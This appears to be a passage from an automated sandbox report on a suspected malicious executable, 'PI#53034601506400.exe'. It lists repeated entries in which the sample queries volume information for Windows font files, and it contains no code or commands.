              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
